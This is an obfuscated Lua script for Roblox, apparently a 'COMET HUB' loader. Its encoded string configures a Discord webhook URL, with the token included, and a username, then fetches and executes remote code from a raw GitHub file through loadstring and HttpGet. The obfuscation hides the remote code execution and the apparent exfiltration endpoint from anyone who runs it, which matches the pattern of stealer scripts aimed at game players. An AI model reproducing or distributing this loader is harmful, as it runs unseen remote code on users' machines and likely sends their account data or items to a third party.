--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==4) then function v25()local v31=v24();local v32=v24();local v33=1250 -(145 + 1104) ;local v34=(v21(v32,4 -3 ,88 -68 ) * ((350 -(157 + (1035 -(273 + 571))))^(47 -(35 -20)))) + v31 ;local v35=v21(v32,(719 -(265 + 452)) + 19 ,22 + 9 );local v36=((v21(v32,4 + 28 )==(1 -0)) and  -(1 -0)) or ((1055 -(1024 + 29)) -1) ;if (v35==0) then if (v34==(0 -0)) then return v36 * (0 + 0) ;else v35=265 -(43 + 221) ;v33=0 -0 ;end elseif (v35==(384 + 1663)) then return ((v34==(651 -(392 + 259))) and (v36 * ((464 -(114 + 349))/(0 -0)))) or (v36 * NaN) ;end return v8(v36,v35-1023 ) * (v33 + (v34/((1598 -(936 + 660))^(1366 -(670 + 644))))) ;end v26=nil;function v26(v37)local v38;if  not v37 then v37=v24();if (v37==0) then return "";end end v38=v3(v16,v19,(v19 + v37) -(2 -1) );v19=v19 + v37 ;local v39={};for v66=1077 -(202 + 874) , #v38 do v39[v66]=v2(v1(v3(v38,v66,v66)));end return v6(v39);end v18=5;end if (v18==7) then function v30(v40,v41,v42)local v43=v40[1];local v44=v40[2];local v45=v40[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v73=v43;local v74=v44;local v75=v45;local v76=v28;local v77={};local v78={};local v79={};for v88=(211 + 609) -(559 + 261) ,v71 do if ((v88>=v75) or ((4242 -(648 + 159))<=(3636 -(150 + 137)))) then v77[v88-v75 ]=v70[v88 + 1 + 0 ];else v79[v88]=v70[v88 + 1 + 0 ];end end local v80=(v71-v75) + 1 + 0 ;local v81;local v82;while true do local v89=0 -0 ;local v90;local v91;while true do if ((v89==(638 -(327 + 311))) or ((6206 -4287)==4584)) then v90=1150 -(680 + 470) ;v91=nil;v89=1 + 0 ;end if (((1892 -953)<=(10718 -6857)) and (v89==(1 -0))) then while true do if (((882 + 124)==(1207 -(72 + 129))) and (v90==0)) then v91=0;while true do if ((v91==(0 + 0)) or ((1082 -(19 + 23))==2409)) then local v106=0;while true do if ((v106==0) or ((22179 -17299)<(3877 -((437 -(16 + 34)) + 618)))) then v81=v73[v68];v82=v81[1 -0 ];v106=(1142 -(1047 + 94)) + (0 -0) ;end if ((v106==(2 -(2 -1))) or ((575 + 271)<(1845 -1218))) then v91=1 -0 ;break;end end end if ((v91==((3179 -2183) -(322 + 673))) or ((137 + 1175)>=(5206 -(172 + 889)))) then if ((v82<=(6 -3)) or ((7952 -5036)>=4029)) then if (((2634 + 1910)==(11080 -6536)) and (v82<=(1 -0))) then if ((3740>=(3986 -2781)) and (v82>0)) then do return;end else v79[v81[2]]();end elseif ((v82>(9 -7)) or ((2030 + 1552)==3971)) then local v115=0 + 0 + 0 ;local v116;local v117;local v118;while true do if (((199 + (1403 -979))==(1239 -(392 + 224))) and (v115==((53 -(20 + 33)) + 0))) then v116=733 -(310 + 423) ;v117=nil;v115=(6 -3) -(3 -1) ;end if (((4615 -1836)>(22 + (2840 -(708 + 209)))) and (v115==(3 -2))) then v118=nil;while true do if ((v116==(769 -(8 + 761))) or ((2405 -1419)<=(167 -(81 + 24)))) then v117=0 -0 ;v118=nil;v116=1 -(0 + 0) ;end if ((v116==(3 -2)) or ((1429 + 32)>=(3034 -(1470 -(239 + 120))))) then while true do if (((8114 -4382)<(17569 -12673)) and (v117==((0 -0) + 0))) then v118=v81[2];v79[v118]=v79[v118](v13(v79,v118 + 1 ,v69));break;end end break;end end break;end end else v79[v81[1734 -(29 + 1703) ]][v81[3 + 0 ]]=v81[154 -(100 + 10 + 40) ];end elseif (((708 + 1869)<(10634 -6422)) and (v82<=(1516 -(56 + 1455)))) then if (((438 + 39)<=(1512 + 480)) and (v82>(1 + 3))) then local v121=0 + 0 ;local v122;local v123;local v124;while true do if (((14950 -(8151 + 2795))>1912) and (v121==(1 + 0))) then v124=nil;while true do if ((v122==(0 -0)) or (((27322 -19676) -4888)>=(3926 -(460 + 197)))) then v123=v81[5 -3 ];v124=v79[v81[3]];v122=1595 -(503 + 1091) ;end if ((v122==(1756 -(10 + 1745))) or ((8 + 34)>1623)) then v79[v123 + (700 -(587 + 76 + 36)) ]=v124;v79[v123]=v124[v81[2 + 2 ]];break;end end break;end if (((64 + 2051)>(590 + 227)) and (v121==(0 + 0))) then v122=0;v123=nil;v121=845 -(623 + 221) ;end end else local v125=0 + 0 ;local v126;local v127;local v128;local v129;while true do if ((v125==(0 + 0)) or ((2836 + 35)<=(200 + 107))) then local v149=0 + 0 ;while true do if (((36 + 124)==(259 -99)) and ((1 + 0)==v149)) then v125=1;break;end if ((0==v149) or (((9723 -4766) -(513 + 1385))<(407 -(14 + (108 -61))))) then v126=v81[1782 -(1385 + 201 + 194) ];v127,v128=v76(v79[v126](v13(v79,v126 + 1 ,v81[6 -3 ])));v149=991 -(162 + 828) ;end end end if ((v125==1) or ((13573 -9410)>=(8844 -4263))) then local v150=0;while true do if ((v150==(0 -0)) or ((2706 -1967)>=4985)) then v69=(v128 + v126) -(262 -(136 + 125)) ;v129=0;v150=1;end if (((1637 + 332)<=(2083 + 624)) and (v150==(919 -(788 + 130)))) then v125=1 + 1 + 0 ;break;end end end if (((3989 -(21 + 310))>730) and (v125==(656 -(651 + 3)))) then for v151=v126,v69 do local v152=0 -(0 -0) ;local v153;while true do if ((v152==0) or (605>(8430 -6362))) then v153=0 + 0 + 0 ;while true do if (((0 + 0)==v153) or ((612 + 3613)==(562 + 495))) then v129=v129 + 1 + 0 ;v79[v151]=v127[v129];break;end end break;end end end break;end end end elseif ((v82>(1568 -(925 + (853 -216)))) or ((597 + 397)>=((1389 + 1963) -(457 + 193)))) then v79[v81[1 + 1 ]]=v81[1 + 2 ];else v79[v81[2]]=v42[v81[4 -1 ]];end v68=v68 + (264 -((32 -21) + 252)) ;break;end end break;end end break;end end end end A,B=v28(v11(v72));if  not A[1] then local v92=0;local v93;while true do if (v92==0) then v93=v40[4][v68] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end if (2==v18) then function v22()local v46=v1(v16,v19,v19);v19=v19 + 1 ;return v46;end v23=nil;function v23()local v47,v48=v1(v16,v19,v19 + (792 -(162 + 628)) );v19=v19 + (1712 -(791 + 919)) ;return (v48 * (847 -(303 + 288))) + v47 ;end v18=3;end if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v49)if (v1(v49,2)==79) then v20=v0(v3(v49,1,1));return "";else local v83=v2(v0(v49,16));if v20 then local v97=0;local v98;while true do if (1==v97) then return v98;end if (0==v97) then v98=v5(v83,v20);v20=nil;v97=1;end end else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v50=0 -0 ;local v51;local v52;local v53;local v54;while true do if (v50==(0 -0)) then v51,v52,v53,v54=v1(v16,v19,v19 + (6 -3) );v19=v19 + 4 ;v50=698 -(452 + 245) ;end if (v50==(3 -2)) then return (v54 * (32335500 -15558284)) + (v53 * (40332 + 13756 + 11448)) + (v52 * (449 -193)) + v51 ;end end end v25=nil;v18=4;end if (1==v18) then v21=nil;function v21(v55,v56,v57)if v57 then local v84=847 -(7 + 840) ;local v85;while true do if ((0 + 0)==v84) then v85=(v55/((1855 -(240 + 1613))^(v56-(94 -((132 -57) + 18)))))%((1 + 1)^(((v57-(1 + 0)) -(v56-(997 -(382 + 406 + 208)))) + 1 + 0)) ;return v85-(v85%(1 -0)) ;end end else local v86=0;local v87;while true do if (v86==0) then v87=(7 -5)^(v56-(3 -(380 -(254 + 124)))) ;return (((v55%(v87 + v87))>=v87) and ((3761 -2379) -(352 + 1029))) or (0 -0) ;end end end end v22=nil;v18=2;end if (v18==6) then v29=nil;function v29()local v58=0 -0 ;local v59;local v60;local v61;local v62;local v63;local v64;local v65;while true do if (v58==(1058 -(415 + 641))) then local v94=0 + 0 ;local v95;while true do if (v94==0) then v95=0 -0 ;while true do if (v95==0) then local v105=89 -(26 + 63) ;while true do if (1~=v105) then else v95=1;break;end if (v105==(1514 -(770 + 744))) then v63=nil;v64=nil;v105=292 -(267 + 24) ;end end end if (v95~=(4 -3)) then else v58=1 + 2 ;break;end end break;end end end if ((0 + 0)==v58) then local v96=0 + 0 ;while true do if (0==v96) then v59=0;v60=nil;v96=1;end if (v96~=1) then else v58=3 -2 ;break;end end end if (v58==(1 + 2)) then v65=nil;while true do local v99=0 -0 ;local v100;while true do if (v99~=0) then else v100=79 -(47 + 32) ;while true do if (v100~=1) then else if (v59~=(407 -(81 + 325))) then else local v107=0 + 0 ;while true do if (v107==(469 -(431 + 36))) then v59=1 + 1 ;break;end if (v107==1) then local v114=0;while true do if ((1405 -(1316 + 88))==v114) then v107=2;break;end if (v114==0) then for v137=1,v64 do local v138=0 -0 ;local v139;local v140;while true do if (v138~=1) then else if (v139==1) then v140=v22()~=0 ;elseif (v139==(1 + 1)) then v140=v25();elseif (v139==3) then v140=v26();end v65[v137]=v140;break;end if (v138~=(0 -0)) then else local v155=1161 -(25 + 1136) ;while true do if (v155~=1) then else v138=1;break;end if (0==v155) then local v163=0;while true do if ((1 -0)==v163) then v155=1087 -(688 + 398) ;break;end if (v163==0) then v139=v22();v140=nil;v163=444 -(251 + 192) ;end end end end end end end v63[3]=v22();v114=1 -0 ;end end end if (v107==(0 -0)) then v64=v24();v65={};v107=1 -0 ;end end end break;end if ((0 + 0)~=v100) then else if (v59==(1215 -(878 + 337))) then local v108=0;local v109;while true do if ((0 + 0)~=v108) then else v109=0 -0 ;while true do if (v109==(364 -(266 + 98))) then local v135=0;while true do if (v135~=(0 -0)) then else v60={};v61={};v135=1;end if (v135==1) then v109=1;break;end end end if (2==v109) then v59=1996 -(1938 + 57) ;break;end if (v109==(150 -(25 + 124))) then local v136=0 + 0 ;while true do if (v136~=0) then else v62={};v63={v60,v61,nil,v62};v136=1 + 0 ;end if (v136~=(529 -(211 + 317))) then else v109=1787 -(1131 + 654) ;break;end end end end break;end end end if (v59==2) then local v110=0;local v111;while true do if (v110==0) then v111=0 + 0 ;while true do if (v111==0) then for v141=1,v24() do local v142=796 -(60 + 736) ;local v143;local v144;while true do if (v142==0) then local v156=0 -0 ;while true do if (v156==(1628 -(932 + 696))) then v143=0 -0 ;v144=nil;v156=1;end if (v156~=1) then else v142=1;break;end end end if (v142==(1 + 0)) then while true do if (v143==0) then v144=v22();if (v21(v144,1 + 0 ,2 -1 )~=0) then else local v166=0 -0 ;local v167;local v168;local v169;local v170;while true do if (v166==(3 -2)) then local v173=0;while true do if ((1 + 0)~=v173) then else v166=2;break;end if (v173==0) then v169=nil;v170=nil;v173=1;end end end if (v166~=0) then else local v174=0;local v175;while true do if (0~=v174) then else v175=0;while true do if (0==v175) then local v185=0;while true do if (v185~=(0 -0)) then else v167=0;v168=nil;v185=1;end if ((1 + 0)==v185) then v175=238 -(173 + 64) ;break;end end end if (v175==1) then v166=1 + 0 ;break;end end break;end end end if (v166==2) then while true do if (v167~=(1829 -(265 + 1562))) then else local v176=0;local v177;while true do if (v176==0) then v177=0 -0 ;while true do if (v177==(0 -0)) then local v186=0 -0 ;while true do if (v186==0) then if (v21(v169,1 + 0 ,4 -3 )==1) then v170[6 -4 ]=v65[v170[2]];end if (v21(v169,2,2)==1) then v170[3 + 0 ]=v65[v170[4 -1 ]];end v186=1 + 0 ;end if (v186==(628 -(350 + 277))) then v177=1133 -(588 + 544) ;break;end end end if (v177==(1989 -(1070 + 918))) then v167=6 -3 ;break;end end break;end end end if (v167==3) then if (v21(v169,3,464 -(176 + 285) )~=(1 + 0)) then else v170[4]=v65[v170[10 -6 ]];end v60[v141]=v170;break;end if (v167==1) then local v179=1601 -(862 + 739) ;local v180;while true do if (0~=v179) then else v180=0;while true do if (v180~=(1 -0)) then else v167=9 -7 ;break;end if (v180==0) then local v187=0;while true do if (v187~=1) then else v180=1 + 0 ;break;end if (v187~=(0 + 0)) then else v170={v23(),v23(),nil,nil};if (v168==(0 -0)) then local v194=0 + 0 ;local v195;while true do if (v194==(1468 -(1377 + 91))) then v195=0 -0 ;while true do if (0==v195) then v170[1231 -(804 + 424) ]=v23();v170[4]=v23();break;end end break;end end elseif (v168==(1 -0)) then v170[2 + 1 ]=v24();elseif (v168==(970 -(368 + 600))) then v170[1588 -(141 + 1444) ]=v24() -((4 -2)^(13 + 3)) ;elseif (v168~=3) then else local v200=916 -(767 + 149) ;local v201;local v202;while true do if (1~=v200) then else while true do if (0==v201) then v202=0 -0 ;while true do if (v202~=(859 -(840 + 19))) then else v170[1763 -(941 + 819) ]=v24() -((2 + 0)^16) ;v170[4]=v23();break;end end break;end end break;end if (v200~=(1918 -(754 + 1164))) then else v201=0;v202=nil;v200=1 + 0 ;end end end v187=1555 -(348 + 1206) ;end end end end break;end end end if (v167==0) then local v181=332 -(144 + 188) ;local v182;while true do if (v181~=0) then else v182=882 -(121 + 761) ;while true do if (v182~=0) then else local v188=0;while true do if (v188==(1 + 0)) then v182=1;break;end if (v188==(0 + 0)) then local v189=0;while true do if (v189==(3 -2)) then v188=1604 -(1093 + 510) ;break;end if (v189==0) then v168=v21(v144,2,3);v169=v21(v144,4,450 -(312 + 132) );v189=1 + 0 ;end end end end end if (v182~=1) then else v167=1 + 0 ;break;end end break;end end end end break;end end end break;end end break;end end end for v145=1,v24() do v61[v145-1 ]=v29();end v111=1;end if (v111~=1) then else for v147=2 -1 ,v24() do v62[v147]=v24();end return v63;end end break;end end end v100=1 + 0 ;end end break;end end end break;end if (1==v58) then v61=nil;v62=nil;v58=1 + 1 ;end end end v30=nil;v18=7;end end end v15("LOL!0B3O0003023O005F4703083O00557365726E616D65030D3O004A652O736963615F537461724103073O004875624E616D6503093O00434F4D455420485542030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130333532383435332O3431393236373630352F634232776975737273335F6D664B5042616976594C385F44747842775277335039353647426B5A2D4466316964676477635466766A4A4B7242766341456F734957696E77030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012063O00013O0030023O000200030012063O00013O0030023O000400050012063O00013O0030023O000600070012063O00083O001206000100093O00200500010001000A0012070003000B4O0004000100034O00035O00026O000100012O00013O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
